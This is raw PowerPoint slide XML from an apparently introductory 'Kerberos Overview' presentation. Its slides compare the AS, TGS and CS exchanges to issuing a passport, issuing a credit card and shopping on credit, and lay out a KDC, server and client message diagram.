            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not a part of Kerberos protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Overview</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="324254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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20539187">
            <a:off x="6326652" y="1515076"/>
            <a:ext cx="2630971" cy="4374950"/>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de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Oval 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="728847">
            <a:off x="3270243" y="1849842"/>
            <a:ext cx="2787742" cy="437495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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Oval 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2307767">
            <a:off x="583095" y="850378"/>
            <a:ext cx="2521902" cy="4374950"/>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de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sub protocols in real life</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Overview</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="C:\Users\tokikuch\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R1BJ3OPG\MC900434898[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2024" y="1548499"/>
            <a:ext cx="777875" cy="7778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tokikuch\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R1BJ3OPG\MC90043488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3776" y="3226355"/>
            <a:ext cx="716280" cy="7162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5" descr="C:\Users\tokikuch\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R1BJ3OPG\MC900434874[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8046" y="2087112"/>
            <a:ext cx="814109" cy="8141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descr="C:\Users\tokikuch\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R1BJ3OPG\MC90043488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95580" y="5142188"/>
            <a:ext cx="716280" cy="7162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9" descr="C:\Users\tokikuch\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZNTEA22\MC900215689[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8834" y="2997193"/>
            <a:ext cx="369970" cy="33877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7" descr="C:\Users\tokikuch\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R1BJ3OPG\MC90043488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1210" y="4610629"/>
            <a:ext cx="716280" cy="7162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C:\Users\tokikuch\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XG1VZCEZ\MC900441319[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79797" y="2718155"/>
            <a:ext cx="604159" cy="60415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C:\Users\tokikuch\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XG1VZCEZ\MC900441319[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60728" y="4968769"/>
            <a:ext cx="604159" cy="60415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9" descr="C:\Users\tokikuch\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZNTEA22\MC900215689[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426" y="3363776"/>
            <a:ext cx="739939" cy="6775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31684" y="1897189"/>
            <a:ext cx="832128" cy="832128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Down Arrow 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2177746">
            <a:off x="1504493" y="2222342"/>
            <a:ext cx="377803" cy="104556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de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1832342" y="2709531"/>
            <a:ext cx="1564396" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Issuing a passport</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>= AS Exchange</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Down Arrow 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="11601984">
            <a:off x="4149729" y="3037272"/>
            <a:ext cx="219463" cy="1915840"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rectangle 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4533037" y="3942439"/>
            <a:ext cx="1523254" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Present an ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Issue a credit card</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>= TGS Exchange</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Down Arrow 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="772103">
            <a:off x="4302129" y="3189672"/>
            <a:ext cx="219463" cy="1915840"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rectangle 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6372983" y="3358468"/>
            <a:ext cx="1696453" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shopping on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>credit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914363">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>= CS Exchange</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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04687" y="4846386"/>
            <a:ext cx="766931" cy="766931"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Down Arrow 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10001706">
            <a:off x="7575038" y="2931004"/>
            <a:ext cx="219463" cy="1915840"/>
          </a:xfrm>
          <a:prstGeom prst="down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de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Down Arrow 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20771825">
            <a:off x="7775637" y="3001605"/>
            <a:ext cx="219463" cy="1915840"/>
          </a:xfrm>
          <a:prstGeom prst="down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              </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187630977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up)">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>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up)">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="35"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="100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down)">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="50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par>
                          <p:cTn id="54" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="55" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="38"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="58" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="59" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="23"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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par>
                                <p:cTn id="67" presetID="10" presetClass="entr" presetSubtype="0" fill="hold"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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="78" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="79" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="50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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="82" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="83" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="84" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="43"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="86" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="87" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="88" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="41"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="8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2" grpId="0" animBg="1"/>
      <p:bldP spid="34" grpId="0" animBg="1"/>
      <p:bldP spid="35" grpId="0"/>
      <p:bldP spid="36" grpId="0" animBg="1"/>
      <p:bldP spid="37" grpId="0"/>
      <p:bldP spid="38" grpId="0" animBg="1"/>
      <p:bldP spid="39" grpId="0"/>
      <p:bldP spid="42" grpId="0" animBg="1"/>
      <p:bldP spid="4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Sub protocols and messages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Overview</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="直線コネクタ 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812346" y="1798320"/>
            <a:ext cx="0" cy="4500000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="テキスト ボックス 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389436" y="1371600"/>
            <a:ext cx="845820" cy="361950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"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sz="2000" b="1" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>KDC</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="直線コネクタ 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2321106" y="1798320"/>
            <a:ext cx="0" cy="4500000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent6"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent6"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="テキスト ボックス 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1898196" y="1371600"/>
            <a:ext cx="845820" cy="361950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent6"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent6"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent6"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"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sz="2000" b="1" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="直線コネクタ 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3822246" y="1798320"/>
            <a:ext cx="0" cy="4500000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent5"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent5"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent5"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="テキスト ボックス 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3399336" y="1371600"/>
            <a:ext cx="845820" cy="361950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent5"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent5"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent5"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"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sz="2000" b="1" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="直線コネクタ 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="831396" y="2278380"/>
            <a:ext cx="2990850" cy="83820"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="stealth" w="lg" len="lg"/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
